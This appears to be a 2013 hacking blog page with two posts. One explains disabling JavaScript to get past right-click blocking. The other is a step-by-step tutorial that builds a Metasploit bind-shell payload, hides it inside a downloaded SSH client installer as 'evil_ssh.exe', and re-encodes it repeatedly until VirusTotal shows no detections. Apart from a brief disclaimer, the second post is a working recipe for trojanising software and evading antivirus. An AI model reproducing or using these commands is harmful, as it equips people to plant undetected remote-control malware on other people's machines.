Search This Blog

Translate

Friday, June 7, 2013

How to Bypass Right Click Block on Any Website

You might remember an experience where you tried to right-click on a web page but got a pop-up message saying that the “right-click functionality has been disabled”. Sometimes you may be trying to copy an image or view the source of a web page but when the right-click is disabled, these things would seem impossible. Bank websites and other sites that require a secure transaction such as a payment gateway are the ones to impose this kind of limited functionality on their pages. In this post, I will show you the ways by which you can easily bypass right-click block feature on any website.
In order to block the right-click activity, most websites make use of JavaScript which is one of the popular scripting languages used to enhance functionality, improve user experience and provide rich interactive features. In addition to this, it can also be used to strengthen the website’s security by adding some of the simple security features such as disabling right-click, protecting images, hiding or masking parts of a web page and so on.

How JavaScript Works?

Before you proceed to the next part which tells you how to disable the JavaScript functionality and bypass any of the restrictions imposed by it, it would be worthwhile for you to take up a minute to understand how JavaScript works.
JavaScript is a client side scripting language (in most cases), which means when loaded it runs from your own web browser. Most modern browsers including IE, Firefox, Chrome and others support JavaScript so that they can interpret the code and carry out actions that are defined in the script. In other words, it is your browser which is acting upon the instruction of JavaScript to carry out the defined actions such as blocking the right-click activity. So, disabling the JavaScript support on your browser can be a simple solution to bypass all the restrictions imposed by the website.

How to Disable the JavaScript?

Here is a step-by-step procedure to disable JavaScript on different browsers:

For Internet Explorer:

If you are using IE, just follow the steps below:
  1. From the menu bar, go to Tools -> Internet Options.
  2. In the “Internet Options” window, switch to Security tab and click on the button Custom level…
    3. IE Security Settings
  3. From the Security Settings, look for the option Active scripting and select the Disable radio button as shown above and click on “OK”.
  4. You may even select the Prompt radio button, so that each time a page is loaded, you will have the option to either enable or disable the scripting.

For Google Chrome:

If you are using Chrome, you can disable the JavaScript by following the steps below:
  1. Click on the Chrome “menu” button (on the top right corner) and select Tools.
  2. From the “Settings” page, click on Show advanced settings…
  3. Now under Privacy, click on the button Content settings…
    4. Chrome Content Settings
  4. Under the JavaScript, select the radio button which says “Do not allow any site to run JavaScript” and click on “Done”.

For Mozilla Firefox:

Steps to disable JavaScript on Firefox:
  1. From the menu bar, click on Tools -> Options.
  2. From the Options window, switch to Content tab, uncheck the option which says “Enable JavaScript” and click on “OK”.
    3. Firefox Content Options

How to Bypass the Right Click Block?

In order to bypass the right-click block or any other restriction imposed by JavaScript, all you need to do is just disable it in the browser and refresh the same page, so that it now reloads without JavaScript functionality. You are now free to right-click on the page, view its source or even copy any of the images that you may want to. Don’t forget to re-enable the JavaScript once again when your job is over. Otherwise lack of JavaScript support may result in unusual rendering of web pages.
Posted by at No comments:
Share on Tumblr

How To Bypass Antivirus Detection - Making An Executable FUD

So in this tutorial we will show you step by step on how to make a virus Fully Undetectable from all the antiviruses. Thought their are lots of approaches, however our team member Malik Rafay has managed to find a way to make an executable FUD using msfencode.


 Requirements 

 A Backtrack machine , real or virtual. I used Backtrack 5 r3, but other versions of Backtrack are working OK too !!!

Attention !!!

We are using some harmless test files but don't infect people with any real viruses that's a Crime and we here at RHA are not responsible for

Purpose:

 Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus.

Creating a Listener:

 This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won't spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:  

 cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe

You should see the listen.exe file as shown below:


Analyzing the Listener with VirusTotal

Go to https://www.virustotal.com/en/

Click the "Choose File" button. Navigate to /root and double-click the listen.exe"listen.exe" appears in the "Choose File" box, as shown below:

In the virustotal web page , Click the "scan it" button !!!
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.
Encoding the Listener

this process will encode the listener, & insert it into an innocent SSH file.
In BackTrack, in a Terminal window, execute these commands:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exemsfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1ls -l evil*

You should see the evil-ssh.exe file as shown below :

Scan with virusTOTAL

Go to: https://www.virustotal.com/
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.
 

Encode the Listener Again This process will encode the listener with several different encodings.
In BackTrack, in a Terminal window, execute these commands:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1msfencode -i /root/listen2.exe -t raw -o

/root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1

msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen*
You should see several files as shown below :


Analyzing Again
The analysis shows that fewer of the antivirus engines detect the file now 0 out of 42 When I did it as shown below. you may see different numbers.
Posted by at No comments:
Share on Tumblr
Subscribe to: Comments (Atom)